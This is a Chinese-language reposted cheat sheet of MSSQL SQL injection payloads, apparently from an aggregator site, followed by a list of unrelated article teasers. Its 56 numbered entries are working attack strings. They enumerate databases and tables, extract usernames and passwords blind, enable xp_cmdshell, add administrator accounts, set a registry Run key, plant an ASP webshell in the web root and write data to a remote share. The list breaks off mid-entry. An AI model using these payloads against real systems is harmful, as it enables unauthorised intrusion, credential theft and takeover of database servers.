很全的SQL注入語句

?

1、返回的是連接的數據庫名
and db_name()>0
2、作用是獲取連接用戶名
and user>0
3、將數據庫備份到Web目錄下面
;backup database 數據庫名 to disk='c:\inetpub\wwwroot\1.db';--
4、顯示SQL系統版本
and 1=(select @@VERSION) 或and 1=convert(int,@@version)--
5、判斷xp_cmdshell擴展存儲過程是否存在
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')
6、恢復xp_cmdshell擴展存儲的命令
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
7、向啟動組中寫入命令行和執行程序
;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\
Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
8、查看當前的數據庫名稱
and 0 <> db_name(n) n改成0,1,2,3……就可以跨庫了 或and 1=convert(int,db_name())--
9、不需xp_cmdshell支持在有注入漏洞的SQL服務器上運行CMD命令(同第76)
10、則把得到的數據內容全部備份到WEB目錄下
;backup database 數據庫名 to disk='c:\inetpub\wwwroot\save.db'
11、通過復制CMD創建UNICODE漏洞
;exec master.dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe?? c:\inetpub\scripts\cmd.exe"
12、遍歷系統的目錄結構,分析結果并發現WEB虛擬目錄
先創建一個臨時表:temp ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
(1)利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中 ?? ;insert temp exec master.dbo.xp_availablemedia;--
通過查詢temp的內容來獲得驅動器列表及相關信息
(2)利用xp_subdirs獲得子目錄列表,并存入temp表中 ?? ?? ?? ?? ?? ??? ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
(3)還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中?? ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (實驗成功)
13、查看某個文件的內容,可以通過執行xp_cmdsell
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
14、將一個文本文件插入到一個臨時表中
;bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
15、每完成一項瀏覽后,應刪除TEMP中的所有內容,刪除方法是:
;delete from temp;--
16、瀏覽TEMP表的方法是:
and (select top 1 id from TestDB.dbo.temp)>0 假設TestDB是當前連接的數據庫名
17、猜解所有數據庫名稱
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0?? dbid=6,7,8分別得到其它庫名
18、猜解數據庫中用戶名表的名稱
and (select count(*) from TestDB.dbo.表名)>0 若表名存在,則abc.asp工作正常,否則異常。如此循環,直到猜到系統帳號表的名稱。
19、判斷是否是sysadmin權限
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
20、判斷是否是SA用戶
'sa'=(SELECT System_user)
21、查看數據庫角色
;use model--
22、查看庫名
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)--
23、獲得第一個用戶建立表的名稱
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0?? 假設要獲得數據庫是TestDB.dbo
24、獲得第二個用戶建立的表的名稱
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz'))>0
25、獲得第三個用戶建立的表的名稱
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz',''))>0?? ''中為第二個用戶名
26、獲得第四個用戶建立的表的名稱
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz','',''))>0?? '',''中為第二,三個用戶名
27、獲得表中記錄的條數
and (select count(*) from 表名)<5 記錄條數小于5?? 或?? <10 記錄條數小于10?? ……等等
28、測試權限結構(mssql)
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(SELECT IS_MEMBER('db_owner'));--
29、 添加mssql和系統的帳戶
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
30、 簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';

請求的時候,像這樣子用:
http://ip/l.asp?c=dir
31、猜解字段名稱
猜解法:and (select count(字段名) from 表名)>0?? 若“字段名”存在,則返回正常
讀取法:and (select top 1 col_name(object_id('表名'),1) from sysobjects)>0?? 把col_name(object_id('表名'),1)中的1依次換成2,3,4,5,6…就可得到所有的字段名稱。
32、 猜解用戶名與密碼
ASCII碼逐字解碼法:基本的思路是先猜出字段的長度,然后依次猜出每一位的值
and (select top 1 len(username) from admin)=X(X=1,2,3,4,5,… n,假設:username為用戶名字段的名稱,admin為表的名稱?? 若x為某一值i且abc.asp運行正常時,則i就是第一個用戶名的長度。
and (select top 1 ascii(substring(username,m,1)) from admin)=n?? (m的值在上一步得到的用戶名長度之間,當m=1,2,3,…時猜測分別猜測第1,2,3,…位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之間的任意值;admin為系統用戶帳號表的名稱),
33、建立數據表
;create table 表名 (列名1 數據類型,列名2 數據類型);--
34、向表格中插入數據
;insert into 表名 (列名1,列名2,……) values ('值1','值2'……);--
35、更新記錄
update 表名 set 列名1='值'…… where ……
36、刪除記錄
delete from 表名 where ……
37、刪除數據庫表格
drop table 表名
38、將文本文件導入表
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表:
create table foo( line varchar(8000))
然后執行bulk insert操作把文件中的數據插入到表中,如:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
39、備份當前數據庫的命令:
declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';--
40、使用sp_makewebtask處理過程的相關請求寫入URL
; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
41、將獲得SQLSERVER進程的當前工作目錄中的目錄列表
Exec master..xp_cmdshell 'dir'
42、將提供服務器上所有用戶的列表
Exec master..xp_cmdshell 'net user'
43、讀注冊表存儲過程
exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
44、xp_servicecontrol過程允許用戶啟動,停止,暫停和繼續服務
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
45、顯示機器上有用的驅動器
Xp_availablemedia
46、允許獲得一個目錄樹
Xp_dirtree
47、提供進程的進程ID,終止此進程
Xp_terminate_process
48、恢復xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'
49、堵上cmdshell的SQL語句
sp_dropextendedproc "xp_cmdshell"
50、不需要XP_CMDSHLL直接添加系統帳號,對XPLOG70.DLL被刪很有效
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
51、在數據庫內添加一個hax用戶
;exec sp_addlogin hax;--
52、給hax設置密碼
;exec master.dbo.sp_password null,username,password;--
53、將hax添加到sysadmin組
;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
54、(1)遍歷目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
55、(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹結構
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內容
56、mssql中的存儲過程
xp_regenumvalues 注冊表根鍵, 子鍵
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個記錄集方式返回所有鍵值
xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定鍵的值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 寫入注冊表
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 刪除某個值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Tes

轉載于:https://www.cnblogs.com/lijinchang/archive/2010/11/26/1888697.html

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/378818.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/378818.shtml
英文地址,請注明出處:http://en.pswp.cn/news/378818.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

使用DataTable更新數據庫

使用DataTable更新數據庫

1、修改數據 DataRow dr hRDataSet.Tables["emp"].Rows.Find(textBox3.Text);//DataRow dr hRDataSet.Tables["emp"].Select("id"textBox3.Text)[0];dr.BeginEdit();dr["name"] textBox1.Text;dr.EndEdit();SqlCommandBuilder cmdn…
閱讀更多...
java異常體系_JAVA異常體系結構詳解

java異常體系_JAVA異常體系結構詳解

一、什么是異常異常&#xff1a;程序在運行過程中發生由于硬件設備問題、軟件設計錯誤等導致的程序異常事件。(在Java等面向對象的編程語言中)異常本身是一個對象&#xff0c;產生異常就是產生了一個異常對象。 ——百度百科二、異常體系Java把異常當作對象來處理&#xf…
閱讀更多...
對照片質量進行壓縮

對照片質量進行壓縮

對照片質量進行壓縮 其實無論是jpg還是png都是已經壓縮編碼化的格式罷了&#xff0c;原圖片的大小要遠遠大于壓縮編碼后的格式 1&#xff0c;像素&#xff1a;圖片放大到一定程度之后的一個個的小方塊 2&#xff0c;RGB&#xff1a;每一個像素&#xff08;小方塊&#xff09;都…
閱讀更多...
Silverlight訪問 Apache服務器(Tomcat,Geronimo)中部署的Webservice

Silverlight訪問 Apache服務器(Tomcat,Geronimo)中部署的Webservice

Silverlight 訪問 Apache服務器中的Webservice 開發環境 Vs2010 、 Silverlight4 、 Java Jdk1.6 U 21 、 Apache-tomcat-6.0.20 、 Myeclipse8.5 、 Apache-ant-1.8.1 、 Axis2 、 Geronimo-tomcat6-javaee5-2.2. 下載地址&#xff1a; Apache-tomcat &#xff1a; http://apa…
閱讀更多...
那些幫助你成為優秀前端工程師的講座——《性能篇》

那些幫助你成為優秀前端工程師的講座——《性能篇》

這篇文章是前端優秀講座和討論列表系列連載第七篇&#xff0c;介紹前端性能優化技巧。前端領域發展迅速&#xff0c;只有時刻掌握前端發展趨勢和技術動態&#xff0c;學習前沿的開發思想和理念才能讓自己跟上時代的步伐&#xff0c;保持自己的技術優勢。 您可能感興趣的相關文章…
閱讀更多...
mca終端_MCA的完整形式是什么?

mca終端_MCA的完整形式是什么?

mca終端1)MCA&#xff1a;計算機應用碩士 (1) MCA: Master of Computer Application) MCA is an abbreviation of Master of Computer Application. It is a masters degree program for post-graduation in Computer applications. This post-graduate course duration is abo…
閱讀更多...
鋼鐵俠java_現代版“鋼鐵俠”,無所不能的程序員,java工程師實現人造器官!...

鋼鐵俠java_現代版“鋼鐵俠”,無所不能的程序員,java工程師實現人造器官!...

一位名叫利亞姆澤貝迪(Liam Zebedee)的軟件工程師已經厭倦了糖尿病患者的生活挑戰&#xff0c;因此他決定入侵他的胰島素泵&#xff0c;并將其轉變成一種嶄新的高科技胰腺胰腺。Zebedee詳細介紹了查找和訂購零件的過程&#xff0c;為智能胰島素泵編寫軟件的代碼以及在其博客中組…
閱讀更多...
Windows下的Memcache安裝 (轉)

Windows下的Memcache安裝 (轉)

Windows下的Memcache安裝&#xff1a;1. 下載memcache的windows穩定版&#xff0c;解壓放某個盤下面&#xff0c;比如在c:\memcached2. 在終端&#xff08;也即cmd命令界面&#xff09;下輸入 ‘c:\memcached\memcached.exe -d install’ 安裝3. 再輸入&#xff1a; ‘c:\memca…
閱讀更多...
C#中實現js中的eval函數功能

C#中實現js中的eval函數功能

在js中有eval函數&#xff0c;比如 eval&#xff08;‘33*4’&#xff09;結果為15&#xff1b; 但C#中想要完成這樣的功能&#xff0c;卻沒有相應的函數&#xff0c;可以用sql語句的方式實現&#xff0c;比如&#xff0c;執行 select 33*4 的方式。 可以先構造公式 Formula …
閱讀更多...
查看照片的指定位置的像素點值,并在照片中繪制一條指定像素顏色的線段

查看照片的指定位置的像素點值,并在照片中繪制一條指定像素顏色的線段

查看照片的指定位置的像素點值&#xff0c;并在照片中繪制一條指定像素的線段 import cv2 img cv2.imread(E:\Python-workspace\OpenCV\yanyu/beyond.png,1)#1為彩色圖片&#xff0c;0為灰度圖片 (b,g,r) img[20,20]#取照片的(20,20)處的像素點&#xff0c;左上角為(0,0)&am…
閱讀更多...
大數據和云計算涉及的技術_云計算涉及的風險

大數據和云計算涉及的技術_云計算涉及的風險

大數據和云計算涉及的技術In todays life using of cloud is very common among people, we use different clouds like Google cloud, cloud Azure etc. to store our photos, Videos, documents, data etc. to save space as well as we think that we will be able to retri…
閱讀更多...
int 轉interger java_Java中Integer和int之間的轉換

int 轉interger java_Java中Integer和int之間的轉換

int到Integer:int a3;Integer Anew Integer(a);或:Integer AInteger.valueOf(a);Integer到int:Integer Anew Integer(5);int aA.intValue();至于Integer.parseInt(String str)則是將String類型轉為int類型。int類型是放在棧空間的&#xff0c;Integer是作為對象放在堆空間的;in…
閱讀更多...
圖像分割-二階導數零交叉點的含義

圖像分割-二階導數零交叉點的含義

已知&#xff1a; 二階導數在灰度斜坡和灰度臺階過渡處會產生雙邊緣響應。 二階導數的符號可以用于確定邊緣的過渡是從亮到暗還是暗到亮。 斜坡開始處&#xff0c;二階導數為負&#xff0c;斜坡結束二階導數為正&#xff0c;斜坡上&#xff0c;二階導數為0.&#xff08;亮到暗…
閱讀更多...
采購子系統-流程圖、表結構、內容簡介

采購子系統-流程圖、表結構、內容簡介

設計說明&#xff1a; 流程圖&#xff1a; 表結構&#xff1a; -- {*******************************************************} -- { } -- { GSP } -- { …
閱讀更多...
題目53:Goldbach's Conjecture

題目53:Goldbach's Conjecture

http://ac.jobdu.com/problem.php?cid1040&pid52 題目描述&#xff1a;Goldbachs Conjecture: For any even number n greater than or equal to 4, there exists at least one pair of prime numbers p1 and p2 such that n p1 p2. This conjecture has not been prov…
閱讀更多...
Anaconda下安裝TensorFlow和OpenCV(都是心血呀~)

Anaconda下安裝TensorFlow和OpenCV(都是心血呀~)

從國慶放假到現在的6號&#xff0c;我整整搞了將近五天多。安裝個TensorFlow和OpenCV不下五次&#xff0c;各種問題各種解決&#xff0c;下載后卸載&#xff0c;卸載后下載&#xff0c;我快吐了啊這個國慶&#xff0c;但是最終還是達到了自己的目標&#xff08;我太難了&#x…
閱讀更多...
圖像分割-基本邊緣檢測roberts,prewitt,sobel,canny,laplace

圖像分割-基本邊緣檢測roberts,prewitt,sobel,canny,laplace

執行邊緣檢測的三個基本步驟&#xff1a; 1、為降噪對圖像進行平滑處理。&#xff08;導數對噪聲具有敏感性。圖像的正負分量檢測困難&#xff09; 2、邊緣點的檢測。&#xff08;提取邊緣點的潛在候選者&#xff09; 3、邊緣定位。&#xff08;從候選者中選出真是邊緣點成員&a…
閱讀更多...
goroutine并發掃描MySQL表_goroutine 并發之搜索文件內容

goroutine并發掃描MySQL表_goroutine 并發之搜索文件內容

golang并發編程 - 例子解析February 26, 2013最近在看《Programming in Go》, 其中關于并發編程寫得很不錯, 受益非淺, 其中有一些例子是需要多思考才能想明白的, 所以我打算記錄下來, 強化一下思路《Programming in Go》在 Chapter 7. Concurrent Programming 里面一共用3個例…
閱讀更多...
軟件開發模型和軟件過程模型_什么是軟件和軟件過程?

軟件開發模型和軟件過程模型_什么是軟件和軟件過程?

軟件開發模型和軟件過程模型軟件 (Software) Software is a set of instructions which instructs the computer for performing different operations. Software is nothing else but a general name for computer programs. 軟件是一組指令&#xff0c;指導計算機執行不同的操…
閱讀更多...
甲骨文CEO埃里森稱將在Sun裁員1000人

甲骨文CEO埃里森稱將在Sun裁員1000人

據國外網站報道&#xff0c;甲骨文CEO拉利埃里森周三表示&#xff0c;在完成對Sun的收購后&#xff0c;將對該公司裁員1000人。不過他同時也表示&#xff0c;未來幾個月還要新雇2000人加強Sun的業務。 分析師們曾預測甲骨文完成收購后&#xff0c;將在Sun大裁員。不過埃里森和甲…
閱讀更多...
最新文章

Copyright @ 2022~2023